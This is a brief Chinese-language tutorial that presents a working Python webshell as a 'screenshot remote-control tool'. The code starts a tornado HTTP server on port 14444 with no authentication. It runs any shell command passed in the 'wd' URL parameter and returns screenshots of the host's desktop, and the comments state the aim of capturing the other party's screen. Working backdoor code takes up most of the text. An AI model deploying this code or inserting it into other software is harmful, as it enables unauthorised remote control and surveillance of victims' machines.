webshell,截屏远程控制利器

技术分解

webapp:web应用

http:80/https:443/ws:80/wss:443

  • http(https)/tcp/udp/ws(wss)

cmd/shell等

html/css/js等

python/asp/php/jsp等

二进制等

流控制等

webshell

url

view

# python webshell
# 步骤:
# 1.构建一款HTTP协议服务器
# 2.独立开放特定端口(http80/自定义)
# 3.构建一个视图view(mvc)
# 4.执行Shell命令+截取对方的桌面
#
# tornado  构建HTTP协议服务器
# pyautogui  截屏
# os  执行cmd或shell命令

from tornado.web import RequestHandler, Application
from tornado.ioloop import IOLoop
from tornado.options import options, parse_command_line, define
from tornado.httpserver import HTTPServer

import os
import pyautogui

define('port', default=14444, help='这是http协议通信端口')


# 页面
class index(RequestHandler):
    # post get
    def get(self):
        # 定义并获取URL的参数
        cmd = self.get_query_argument("wd", '')
        if cmd == 'screenshot':
            # 截屏
            img = pyautogui.screenshot()
            img.save('screenshot.png')
            # 二进制返回
            pic = open('screenshot.png', 'rb')
            pics = pic.read()
            self.write(pics)
            self.set_header("Content-type", "image/png")
        else:
            rs = os.popen(cmd, 'r')
            self.write(rs.read())


def makeapp():
    return Application([(r'/', index)])


if __name__ == '__main__':
    parse_command_line()

    app = makeapp()

    # 把应用部署到httpserver
    server = HTTPServer(app)
    server.bind(options.port)
    server.start()

    IOLoop.current().start()